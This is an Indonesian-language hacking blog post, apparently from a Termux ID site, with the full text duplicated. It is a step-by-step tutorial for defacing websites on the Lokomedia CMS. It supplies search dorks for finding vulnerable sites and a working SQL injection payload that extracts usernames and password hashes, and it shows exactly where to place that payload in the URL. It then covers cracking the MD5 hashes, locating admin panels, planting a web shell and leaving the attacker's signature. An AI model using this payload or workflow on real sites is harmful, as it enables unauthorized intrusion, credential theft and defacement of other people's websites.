Deface SQL Lokomedia - Termux ID -->





Malem fanss :* Malem juga haters :p

Berandal update lagi nih :* Kali ini gw mau share Tutorial Deface CMS Lokomedia. Gw bikin tutorial ini gara2 gw liat salah satu kiriman Master Lokomedia di grup FB Indonesia Defacer Tersakiti. Gw bingung gimana sih kok bisa dapet segitu banyak :v Wkwk :v

Baca juga: Tutorial Deface WP Themes Qualifire.

Oke, simak langsung aja ya :)

Bahan : 

1. Dork :

inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
   Kembangin lagi biar dapet yg VULN + Perawan :p
   Dork lengkap tunggu post selanjutnya :*

2. Exploit
    'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

3. MD5 Decrypter
      KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI! 
      Bercanda :v Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/

Tutorial:
1. Dorking pake dork di atas.

2. Pilih salah satu target. Salah dua juga gapapa :v

3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ 
   Gatau caranya? :v Sini gw ajarin :p
   http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
   http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

4. Kalo vuln jadinya bakal kek gini.



5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.

6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur

7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!

8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.

9. Jan lupa pasang nick gw di Script lu :v Berandal & OWL SQUAD :)

Saran gw sih, jangan langsung injek web nya. Cari dulu admin login nya :) Biar gak sakit hati :P
Simak video gw dibawah :D



Okee, cukup ya tutor kali ini :D Kalo ada salah2 kata mohon maap :)


Regards,

Deface SQL Lokomedia






Malem fanss :* Malem juga haters :p

Berandal update lagi nih :* Kali ini gw mau share Tutorial Deface CMS Lokomedia. Gw bikin tutorial ini gara2 gw liat salah satu kiriman Master Lokomedia di grup FB Indonesia Defacer Tersakiti. Gw bingung gimana sih kok bisa dapet segitu banyak :v Wkwk :v

Baca juga: Tutorial Deface WP Themes Qualifire.

Oke, simak langsung aja ya :)

Bahan : 

1. Dork :

inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
   Kembangin lagi biar dapet yg VULN + Perawan :p
   Dork lengkap tunggu post selanjutnya :*

2. Exploit
    'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

3. MD5 Decrypter
      KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI! 
      Bercanda :v Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/

Tutorial:
1. Dorking pake dork di atas.

2. Pilih salah satu target. Salah dua juga gapapa :v

3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ 
   Gatau caranya? :v Sini gw ajarin :p
   http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
   http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

4. Kalo vuln jadinya bakal kek gini.



5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.

6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur

7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!

8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.

9. Jan lupa pasang nick gw di Script lu :v Berandal & OWL SQUAD :)

Saran gw sih, jangan langsung injek web nya. Cari dulu admin login nya :) Biar gak sakit hati :P
Simak video gw dibawah :D



Okee, cukup ya tutor kali ini :D Kalo ada salah2 kata mohon maap :)


Regards,